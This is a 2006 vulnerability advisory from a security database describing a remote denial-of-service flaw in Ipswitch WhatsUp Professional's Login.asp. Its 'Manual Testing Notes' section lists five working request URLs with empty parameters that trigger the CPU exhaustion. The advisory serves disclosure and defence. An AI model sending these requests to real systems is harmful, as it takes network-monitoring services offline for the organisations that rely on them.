Ipswitch WhatsUp Professional NmService.exe Malformed Request CPU Consumption DoS

2006-02-22T09:18:35
ID OSVDB:23494
Type osvdb
Reporter Josh Zlatin-Amishav(josh@ramat.cc)
Modified 2006-02-22T09:18:35

Description

Vulnerability Description

WhatsUp Professional contains a flaw that may allow a remote denial of service. The issue is triggered when the Login.asp script receives a NULL parameter setting for parameters that the script expects to receive, and will result in loss of availability for the platform.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

WhatsUp Professional contains a flaw that may allow a remote denial of service. The issue is triggered when the Login.asp script receives a NULL parameter setting for parameters that the script expects to receive, and will result in loss of availability for the platform.

Manual Testing Notes

http://[target]/NmConsole/Login.asp?bIsJavaScriptDisabled= http://[target]/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName= http://[target]/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword= http://[target]/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn= http://[target]/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=

References:

Vendor URL: http://www.ipswitch.com/ Other Advisory URL: http://zur.homelinux.com/Advisories/ipswitch_dos.txt Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0546.html FrSIRT Advisory: ADV-2006-0704 CVE-2006-0911 Bugtraq ID: 16771